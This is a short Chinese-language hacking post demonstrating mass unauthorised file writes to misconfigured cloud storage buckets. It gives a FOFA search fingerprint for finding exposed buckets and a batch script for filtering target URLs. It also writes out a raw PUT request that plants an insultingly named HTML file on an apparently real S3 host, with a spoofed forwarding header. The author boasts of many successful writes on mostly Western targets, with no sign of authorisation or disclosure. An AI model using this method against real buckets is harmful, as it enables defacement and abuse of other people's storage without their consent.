很多厂商因为 bucket policy 设置未配置完善导致存储桶大量的存储桶存在任意写文件的漏洞,今天借助 FOFA 给个演示
1、Fofa 搜索如下
body="<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>"
2、利用 snow-wolf 中的 fofa 采集模块采集目标 url
3、以下代码提取只有 https 的部分
@echo off
setlocal enabledelayedexpansion
set num=0
type nul>https.txt
for /f %%i in (bucket.txt) do (
echo %%i|findstr "https://"
echo %%i|findstr "https://">>https.txt
set /a num=!num!+1
title !num!
)
pause
4、采用类似 IIS 写文件的方式,PUT请求批量写入,会在每个域名下生成 lianan_fucker.html文件
PUT /lianan_fucker.html HTTP/1.1
Host: aurdia.s3.ca-central-1.amazonaws.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
X-Forwarded-For: 8.8.8.7
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
Connection: close
<h1>
dddd
</h1>
5、再次访问发下以下 200 状态码的全部成功写入,数量相当多,目标基本全是欧美的。
